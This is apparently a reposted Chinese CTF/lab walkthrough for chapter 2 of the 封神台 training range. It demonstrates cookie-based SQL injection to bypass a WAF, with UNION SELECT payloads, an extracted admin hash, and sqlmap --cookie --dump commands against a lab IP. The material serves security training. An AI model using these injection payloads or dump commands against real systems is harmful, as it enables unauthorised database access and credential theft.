我是靠谱客的博主 怕黑朋友,最近开发中收集的这篇文章主要介绍封神台靶场-第二章第二章:遇到阻难!绕过WAF过滤,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

第二章:遇到阻难!绕过WAF过滤

1.查找有无sql注入点利用and 1=1发现做了过滤
在这里插入图片描述
使用order by 查字段数发现order by 没有被过滤,最后当字段为10时显示正常字段为10
在这里插入图片描述
2.因为网页做了waf过略防护,这里我们考虑用cookie注入,可以进行绕过:
这里我们使用一个小工具进行注入(火狐插件)
在这里插入图片描述
这款工具可以自定义请求头响应头(Request header,Reponse header)
打开这款插件直接在value处填写注入参数即可然后按上面的键开始(value中的值需要注意的是空格用+表示)
在这里插入图片描述
3.使用联合查询
这里我们做了猜测一般表名为admin,猜测尝试字段(admin,password,)

查询语句结果
id=1171+union+select+1,2,3,4,5,6,7,8,9,10+from+admin查看回显
id=1171+union+select+1,username,password,4,5,6,7,8,9,10+from+admin查询字段值

注意:这里id必须为假才会执行后面的语句
在这里插入图片描述
回显位置:2/3
在这里插入图片描述
3.字段值(admin:b9a2a2b5dffb918c)
在这里插入图片描述
4.用御剑后台扫描器扫描查找网站后台
在这里插入图片描述
5.登录后台拿到flag
在这里插入图片描述

kali-sqlmap

1.sqlmap cookie注入用法
sqlmap -u [url] --cokie [id=] --[table|dbs|columns] --level [2] --batch

sqlmap-cookie注入查询
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” --table --level 2查表
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin --columns --level 2指定表查字段
sqlmap -u http://59.63.200.79:8004/shownews.asp? --cookie “id=171” -T admin -C username,password --dump --level 2制定字段查值

1.查表
在这里插入图片描述
这里到查到一半出来了我就结束了在这里插入图片描述
2. 查字段
在这里插入图片描述
在这里插入图片描述
3. 查字段值
在这里插入图片描述
这里到查到一半出来了我就结束了
在这里插入图片描述

最后

以上就是怕黑朋友为你收集整理的封神台靶场-第二章第二章:遇到阻难!绕过WAF过滤的全部内容,希望文章能够帮你解决封神台靶场-第二章第二章:遇到阻难!绕过WAF过滤所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(49)

评论列表共有 0 条评论

立即
投稿
返回
顶部